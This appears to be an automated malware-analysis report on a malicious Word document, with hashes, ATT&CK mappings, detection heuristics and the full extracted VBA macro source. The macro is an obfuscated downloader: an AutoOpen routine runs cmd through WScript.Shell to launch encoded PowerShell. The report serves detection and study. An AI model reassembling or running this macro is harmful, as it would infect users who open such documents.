Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a65ed438212c652d…

MALICIOUS

Office (OLE)

Size: 78.9 KB
Created: 2018-08-21 22:21:00
Authoring application: Microsoft Office Word
First seen: 2018-08-26
MD5: 2cd1ce0c60c66a56481420b45d8ed581
SHA-1: b2547c03a3ee151d04bdc93a675c76f55eb56fba
SHA-256: a65ed438212c652de3b0a414fbc81ecadfc10bf3aa96cf8607a1054ec2c596de
Risk Score: 310

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros with an AutoOpen routine, a common technique for executing malicious code as soon as the document is opened. Critical heuristics indicate the use of WScript.Shell and the Shell() function, strongly suggesting the script attempts to download and execute a second-stage payload. The reconstructed command ``md /V/C S^e^T^ ^ Q^y^i^6=^p^o^w^er^%he^l^l^ -e^ J^#^B^[^#/^E^#e^g^.#^Bp#G^U#^.^g^B^?`^%^#^J^#^Br`` (the AutoOpen line prepends ChrW(1 + 3 + 8 + 9 + 46), i.e. "C", so the string handed to WScript.Shell begins with "Cmd /V/C") shows the Windows command shell being used, with caret insertion and delayed variable expansion (/V) obscuring the text, to launch an encoded PowerShell command (-e), most likely to fetch and run further malware.

Heuristics (10)

  • ClamAV: Doc.Downloader.Generic-6665598-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6665598-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage (critical) OLE_VBA_WSCRIPT
    Matched line in script:
      On Error Resume Next
      CreateObject("WScript.Shell").Run! ChrW(1 + 3 + 8 + 9 + 46) + UOSVLtjFjkdrbZ + zQXKMuPDmBPw + jAXolAF + KJVtVWukFcf + ImjkiBkZ + ZSKiLOqwKsl + Elzojkj + CAwvdI + JdPEZiKhHGumjm + tUEwiEhQmZzO, 188069728 - 188069728
      End Sub
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    Matched line in script:
      On Error Resume Next
      CreateObject("WScript.Shell").Run! ChrW(1 + 3 + 8 + 9 + 46) + UOSVLtjFjkdrbZ + zQXKMuPDmBPw + jAXolAF + KJVtVWukFcf + ImjkiBkZ + ZSKiLOqwKsl + Elzojkj + CAwvdI + JdPEZiKhHGumjm + tUEwiEhQmZzO, 188069728 - 188069728
      End Sub
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low) OLE_VBA_AUTOOPEN
    Matched line in script:
      Sub AutoOpen()
      On Error Resume Next
  • Reference to Windows Script Host (high) SC_STR_WSCRIPT
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (medium) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body). This is the standard DrawingML XML namespace URI that Office writes into documents, not a download location.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11076 bytes
SHA-256: 04248cc6a59e092fadecbac818dac2b764f2333badb3018526f23c6a0d06d8ff
Detection
ClamAV: No threats found
Obfuscation or payload: likely
124 of 195 identifiers look randomly generated (e.g. 'JdPEZiKhHGumjm'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "iCGjuRj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jcHcCcqU"
Function jAXolAF()
On Error Resume Next
VarType 89455 + mquJj / ibRzrz - 85918
   HjdKE = 61734 - 99722
PcBtbrpk = "md " + "/V/C" + CStr(Chr(aMPAEGzVSJiP + upqRhiJSvaof + 34 + GzELlppWbYSiSG + flrZiTwwjG)) + "S^e" + "^T^ ^" + " ^ Q" + "y^i" + "^6^=^p^"
HjdKE = 66322 - HNGiUF - 92518 + wuPrDK
   HjdKE = Log(QLQVHo)
   IsArray 54951 / EOtLt
JOOIdvurc = "o^w^er" + "^%he^" + "l^l^" + " -e^ ^J" + "^#^B" + "^[" + "^#/^" + "E^#" + "^e^g^"
HjdKE = Sqr(490307260)
   VarType Tan(RAJtfM)
   IsArray Cos(90078994)
qkFzUNiJ = "#^9" + "^" + "#" + "^G4#ZQ" + "^B^" + "5^#C" + "?^" + "#.w^" + "B^i" + "#^" + "G^o^" + "#ZQ^Bj#" + "^H"
HjdKE = swtuPv - DlBuX
   IsArray CDate(7)
PczktabYK = "Q^#" + "I#B" + "O#^G" + "^U#^d" + "#^#:#/" + "c^#" + "Z^Q" + "B^" + "i#EM#^"
VarType CBool(uNnTwP)
JadXKKWSiq = ".#^Bp#G" + "^U" + "#" + "^." + "g^B^" + "?#^" + "`^%^#^J" + "^#" + "^Br"
jAXolAF = PcBtbrpk + JOOIdvurc + qkFzUNiJ + PczktabYK + JadXKKWSiq
   VarType ijmBj / 60313 + iHIYOX / ssvoqZ
End Function
Function KJVtVWukFcf()
On Error Resume Next
IsArray 23391 + CiQfJR
   IsArray 11241 * MPBVU
   VarType CStr(PKkwZI)
BQBWOB = "^#E8#Z" + "^#^#" + "^9#" + "Cc^#" + "^" + "a#^B" + "?#H" + "^Q#c" + "^#^#}^" + "#C"
VarType Tan(90)
   IsArray CByte(2)
   IsArray 99163 * QaVwnL - JMjdUl * oipuq
   HjdKE = CByte(90462 / CbPUKj)
XrqUzEOAYcn = "^" + "8#" + "^Lw" + "B^?^#G" + "^U^#cwB" + "^?#`^" + "U#^" + "Lg" + "Bw^#" + "^G^U^#" + "d#^B" + "^"
IsArray Rnd(59265 - ilVhYj - 75702 + bUZvmt)
GBQqvOdbz = "l^#^H^I" + "#^d^" + "w^Bv" + "#" + "^G8^#Z" + "#^Bp#G" + "^" + "4" + "#Z^w^#"
HjdKE = Cos(2024)
   HjdKE = Round(nLRdPc / zCALR)
   HjdKE = 17372 * disZGi / 14801 * ECdAm
FRMczU = "^:^#" + "G" + "M^#.^w^" + "B'#C8^" + "#SgB" + "^z#E^4#" + "^MQB^Z^" + "#^" + "H" + "^U" + "#d" + "^Q#4^"
IsArray iwnJiq + CbkIah * KsGtQ / 61226
   HjdKE = CCur(341707968)
   HjdKE = Oct(71202 / 22511)
ijalBNf = "#" + "^E" + "^##a^" + "#B^?^" + "#HQ#" + "c" + "^##}^"
HjdKE = Hex(90717 / GSqTT * RSJmo / ihaCN)
idjuUwLuiS = "#C" + "8^" + "#^L^" + "wB^" + ":#^G^U#" + "dw^#^" + ":#^G" + "^g^#a^Q" + "^B^%#GE"
HjdKE = 46405 + 46326
   HjdKE = WQzFA * rICSd
   IsArray 68633 * SqIXR + mcMqc + 11946
   IsArray Rnd(38392 * unKjJ)
   IsArray CDec(wTvql)
   VarType bTHHJi + uBKhns
UqwzowfTLwL = "^#cg^B^" + "p^#G^" + "8#dQ" + "^B^z" + "#C4^#" + "^YgB" + "l#C^" + "8#" + "c^Q^" + "BK#G^8#" + "c^w^" + "Br^#H" + "c^#^"
VarType Oct(NBaSsU)
   VarType Cos(zmnuR)
   VarType Sqr(LUZlD)
   VarType Tan(cGwHb)
   IsArray XhawXp - 34068 / 6151 - ddbWfQ
   VarType Oct(EYEhTm)
FtBwBuzQfV = "Q^#^Bo^" + "#HQ^" + "#^d#B" + "^w" + "#^`^" + "o^#Lw^#" + "v^" + "#^G?^#Y" + "QBy#"
HjdKE = CCur(sDnfwC)
   VarType 54269 * ObbVi
mZlGakhFv = "^GM" + "#aQBh^" + "#^Gw" + "^#ZwBh#" + "^HI#^" + "Y" + "wBp^#" + "G^E#^Lg"
VarType Val(nzmfzs - jUdAU + hpWSAc / wLwii)
   HjdKE = cwiwTW / uAAQY
   HjdKE = CDec(Puibb)
dXYXiYSwIF = "B^" + "j^#^G8#" + "^.Q#^:^" + "#^GI^#c" + "^g^"
VarType CDate(JjCXJr)
   VarType 84591 * FRGSKV
   HjdKE = CDate(FtsRl)
   IsArray 6058 - BBiJl + CYbwEr * VjGSBK
   IsArray CDate(DjzAu / vSsrJK)
tzzDKdb = "#v#" + "EM^#_" + "^#^Bm^" + "#/^E^#^" + ".^g^B"
VarType SHmvIm / zrdUsw * wQaON / szzZIn
   VarType TnDmr + hnozJ / 12224 - JSUXEH
tZslsokKrl = "##Gg#^" + "d#B" + "^?" + "#H#^#" + "Og^#" + "v^#C^8#" + "d^wB5#" + "Hc" + "^" + "#L^g^B" + "'#^H^" + "U" + "^#^aw"
HjdKE = CDate(kGDQw + 35174)
   VarType 54714 * DfMAR + wjbNP + bMouRc
   VarType nULhj / ZhAnW + caEHb * 67169
btBzDtWj = "B?#G^8" + "^#^LgB^" + "y^#" + "^HU" + "#c^#^B" + "v^#G^%#"
KJVtVWukFcf = BQBWOB + XrqUzEOAYcn + GBQqvOdbz + FRMczU + ijalBNf + idjuUwLuiS + UqwzowfTLwL + FtBwBuzQfV + mZlGakhFv + dXYXiYSwIF + tzzDKdb + tZslsokKrl + btBzDtWj
   HjdKE = Sin(EUqBZK)
End Function
Function ImjkiBkZ()
On Error Resume Next
HjdKE = Hex(2)
   HjdKE = Rnd(8832)
   HjdKE = lhKjp + 97834
fzmnaJYvJ = "L^gB^:" + "#^G^U^" + "#d^#" + "^#v#" + "/^M^" + "#Q#Bo" + "^#HQ#" + "d^#^B" + "^w^#" + "^`^o#" + "^" + "L^w#v#^" + "H^o^"
VarType Val(zZZGjB)
   HjdKE = 99754 - vQdzvl * OTriu - UYwmii
   HjdKE = CVar(MJGSj / 24527 * LVzstu - 77227)
dYKIfYC = "#Y^Q" + "Bp#" + "G4#" + "^YQ^B" + "^i#" + "^H^M#" + "^a^" + "Q^B^" + "w" + "#H^I" + "^#YQ#^:" + "^#G^I^#"
VarType Atn(353827860)
RFEHGiZ = "^.^" + "#" + "^B" + "v^" + "#" + "^Gc#^Lw" + "^Bw^#GY" + "#cgB^[^" + "#E8^#J" + "w" + "#:^#/^M" + "^#c" + "#^B^%#G"
HjdKE = Month(411291583)
   HjdKE = Rnd(5)
   VarType Val(chWHiJ)
MrwvPK = ",#^d^#" + "#^o#Cc#" + "Q^##n#" + "C," + "^#" + "Ow#^" + ",^#^Ec^" + "#^SwBH"
IsArray Round(kkPRYs)
kPSaKGKrctP = "^" + "#C^##" + "[^" + "Q#g" + "^#C" + "c" + "#N^##" + "^y#^" + "`,^#"
VarType 87503 / UBwcnc - dvjkko + cwGqf
   IsArray Rnd(fhQrR)
   VarType 84771 - IjnLX * FPPnc - MrCCK
   HjdKE = VQliU * HFHsLu / 36289 / WSDrGl
KjjiSDp = "J^w^#7" + "#C" + "Q^#c" + "^gB?^" + "#" + "^GY^#" + "[^Q" + "^#^," + "^#^G" + "U#^.g" + "B" + "^"
IsArray Cos(1767)
   VarType TypeName(ovKdN)
   VarType CDbl(WUdSkO)
zImbOtUvTza = "2#`^o^" + "#c^" + "#B^1" + "^" + "#GI^#" + ".^#^B" + "^p#^GM" + "^#K^"
HjdKE = LCase(WTMBSJ / ImDJP - VQOiw - ttOvS)
   IsArray Month(lQNGWa - QdFUkb)
   HjdKE = Cos(251)
uBwqwYiUz = "w^#" + "n^#/w^" + "#" + "^" + "J"
VarType Hex(BRsfV)
   HjdKE = CVar(hXHvJt)
icJjIOY = "^w" + "^#r^" + "#" + "C^Q^#R^" + "w^B^L" + "#Ec^#^K" + "w#n" + "^#C^" + "4#Z"
VarType GNZwM * EVYln
   IsArray 6101 + KivMr - naSqIX + fzwjaP
   IsArray KmSXq / TUrCnu
UidjZ = "QB^" + "4^#GU" + "^#Jw#7" + "#G" + "Y^#.w" + "^B^" + "y#^" + "GU#YQB" + "j#Gg#K"
HjdKE = CDbl(VfoUL)
   HjdKE = Round(pjLHzE)
   HjdKE = Atn(6759)
   IsArray Str(NicjF)
sFhBoRG = "^##,^#" + "/^,#^Z" + "gB^Q#C" + "^#^" + "#a" + "QB^:#C" + "#^#" + "^J#^B"
ImjkiBkZ = fzmnaJYvJ + dYKIfYC + RFEHGiZ + MrwvPK + kPSaKGKrctP + KjjiSDp + zImbOtUvTza + uBwqwYiUz + icJjIOY + UidjZ + sFhBoRG
   IsArray Oct(3)
   VarType 65365 * uPKlEF - JmjEbk / GQwJM
End Function
Function ZSKiLOqwKsl()
On Error Resume Next
HjdKE = Atn(dfDoKk)
   IsArray Oct(820)
   IsArray Str(94732 * ROSQjE)
ZErjONNzN = "r#E8" + "^#Z^##" + "p#^H^%#" + "d#" + "^B^y#H^" + ",#" + "e^w#" + ",^#^E" + "^8#^UQ" + "^" + "B^}" + "^#C4"
IsArray 1893 / SKAuvj + 27780 / izYdri
   HjdKE = 25055 * qmLZi + 5564 * zEERG
jijnsZIoG = "^#R^#B" + "v^#^Hc" + "^#.g^B" + "^%^#" + "^G^8" + "#^YQB,#" + "E^Y^#^" + "a^" + "QB^%" + "#GU#^K#" + "^#,#" + "/" + ",^#^"
VarType Val(9134)
   VarType 74595 * KzmwX
   IsArray Round(1)
FriYjjlcfZ = "Z^g^BQ^" + "#C" + "w^" + "#^" + "I##^,^#" + "^H" + "I^"
VarType CDbl(jYAoZ)
   IsArray CDate(QSmpAk + swqbw + WzlZhh - QwWAIk)
kslMTwijjJQ = "#^d^#" + "B" + "m^#" + "C^,^" + "#^O^" + "w"
IsArray CBool(63865 / YlIzZ / BjaRkM * UBLWt)
   IsArray CVar(iMozW)
   HjdKE = Rnd(zQfuIv)
   HjdKE = NJMiE - dKFBzh / 74963 - HrqhTv
NjYZKIBbWip = "^BJ^" + "#^G4" + "^#^" + "d^gBv" + "#G^%#ZQ" + "#'" + "^" + "#E" + "," + "^"
VarType Val(aclOj - otwaDN)
CzHakr = "#" + "^d^" + "#^B^l#^" + "G^?" + "#I^##^," + "#" + "^" + "H^I^#"
HjdKE = QCOjX / WzCudh
   HjdKE = LdQIzF / fWfifI / vqczN - YvHaQO
bmSNKViO = "^d" + "#^B^m#^" + "`^%^#" + "^Y^g^B^" + "y" + "^#"
VarType UCLdwl * mFFPak + 61338 + 66824
YwHzzovJWD = "^G^U" + "#^YQ^Br" + "^#`^%#^" + "f" + "Q^Bj^#G" + "^E#^d#" + "^B^" + "j#" + "G" + "g^#" + "e^w^" + "B^9"
HjdKE = Sin(HCMSdT * XPVqr)
   IsArray Atn(TwCdT)
YikCquN = "#H^?#^" + "I#^#^g^" + "#" + "C^#" + "^" + "#^" + "I##g#C^" + "#"
IsArray TypeName(3)
   HjdKE = LCase(DXuwNo)
wnsvrG = "^#" + "I##^g#" + "C##^I##" + "g#C^#^#" + "^I^" + "##^g" + "^#C#^#I" + "##g#^#" + "==" + "&    " + "S^e^"
VarType CBool(YjwcX)
rolFrIcvwwK = "t ^ ^" + "  ^" + "m^" + "a" + "^i=^!^Q" + "^y" + "i^6:^`=" + "D^" + "!&S" + "^e^T " + " ^ ^Y^"
ZSKiLOqwKsl = ZErjONNzN + jijnsZIoG + FriYjjlcfZ + kslMTwijjJQ + NjYZKIBbWip + CzHakr + bmSNKViO + YwHzzovJWD + YikCquN + wnsvrG + rolFrIcvwwK
   VarType CStr(15)
   HjdKE = Round(FYVcwN)
   HjdKE = Oct(GodFk)
End Function
Function Elzojkj()
On Error Resume Next
VarType 48373 / EbwmH
   IsArray CStr(IujVK)
   VarType Oct(wUSDE)
rnKMF = "o9=" + "^!^m" + "^a^i^:" + "/^=^" + "F^"
IsArray Int(fbvRJ)
   HjdKE = Hex(YjGzl)
   VarType CVar(71594 * JRXOHp + 43103 / 89640)
hibJd = "!&" + "& S^" + "Et  ^ ^" + " ^Mg9^" + "i=^" + "!" + "^Y^o^9^" + ":" + "'^=^t" + "!&&  s^" + "E" + "^T ^  "
IsArray Round(57018 + JsjXj)
tNwRnWprBsG = "^0^H" + "Y=^!^M" + "^g^9^" + "i" + "^:^" + "[=^P!& " + "   S^e" + "t ^ ^  " + "^K^m=" + "!^0^HY" + "^"
HjdKE = 19838 / EjPcjj - mULtOF / wmpfO
wvdktS = ":" + "%=" + "s^!&   " + "S^eT" + " ^  " + " ^ X"
HjdKE = 74252 - CiDwjX / YBnKvp * bZcHzs
   VarType CDec(4798)
   HjdKE = kHScra + oMVfkq + FDsLY + vEkmD
   IsArray Sqr(74714 * tWXDLN * HKHrTs / wXjUMq)
CsvcldcW = "^h=!" + "^K^" + "m" + ":#^=^A" + "!&" + " S^E^" + "t " + "^ ^" + " ^  qo" + "^"
VarType 59402 / FMCjd
   IsArray Round(443)
mKBwQVzTKM = "J^a=^" + "!^X^" + "h^" + ":^.^" + "=b!&& S"
HjdKE = Rnd(1)
   IsArray CStr(8)
   HjdKE = TimeValue(jtAidY)
   IsArray 40354 / IRSki - 67037 + jhkJZH
ZljjstFMz = "^e" + "T" + " ^ ^  " + "^7^8" + "F" + "=^!^q^" + "o^J^a^:" + "}^=6^" + "!&SE^t " + " ^ ^" + " ^1^k"
IsArray doXrG + 77616
stDOYWED = "^gx" + "=^!^" + "7^8F:?" + "^=0^!" + "&& s" + "^e^T" + " ^ ^" + "mq=^!" + "^" + "1^k^g" + "^x^:^,^" + "=^k^!&&"
VarType Rnd(RLoNO + dYwiw + 75398 / ouMUMk)
   IsArray Log(jkraBu - obwEw)
tjUYUNlLPz = "s^" + "E^" + "T ^" + " ^ ^ ^" + "x^WV" + "=!^mq^:" + "^5" + "=^3^" + "!&& " + "   "
Elzojkj = rnKMF + hibJd + tNwRnWprBsG + wvdktS + CsvcldcW + mKBwQVzTKM + ZljjstFMz + stDOYWED + tjUYUNlLPz
   HjdKE = CDate(uVfzE)
End Function
Function CAwvdI()
On Error Resume Next
VarType Sgn(iXiAc)
   VarType 72533 + UqQhaz * 75721 - 24370
FYYcuEm = "se" + "^t  ^ Q" + "^" + "F^" + "4=!^x^W" + "V^:^" + ":^=^u" + "!&& " + " s^ET " + "^"
VarType Hex(VirquK)
   VarType CDate(69163 - kwwwi - 36497 - tUGTnj)
   HjdKE = CDec(79378 - MmuhH + ZskktO - ZfNHk)
   IsArray CByte(34990 + 97914 * mimIiM + TuqKp)
DEznAYUkwM = " ^" + " Y^h^" + "Wq" + "=!Q^F^" + "4^:^" + "_^" + "=T^!&" + " " + " C^a^L^" + "L %Y^" + "h^W" + "q% "
VarType VQOzp / COZWf
iqDSdsvA = "  " + CStr(Chr(RpMYpzOS + iKvYORwDM + 34 + auDorRnBFc + hFlMuoSrc)) + "  " + ""
CAwvdI = FYYcuEm + DEznAYUkwM + iqDSdsvA
   HjdKE = DaBwGW * MzZaY
   HjdKE = Second(69617 * MXdLO - Jlbcn - 10846)
   HjdKE = rUJSo + QVbJt
   HjdKE = 51516 - fwiah * 83018 + 42705
End Function


Attribute VB_Name = "ZvqYdDFdD"

Sub AutoOpen()
On Error Resume Next
CreateObject("WScript.Shell").Run! ChrW(1 + 3 + 8 + 9 + 46) + UOSVLtjFjkdrbZ + zQXKMuPDmBPw + jAXolAF + KJVtVWukFcf + ImjkiBkZ + ZSKiLOqwKsl + Elzojkj + CAwvdI + JdPEZiKhHGumjm + tUEwiEhQmZzO, 188069728 - 188069728
End Sub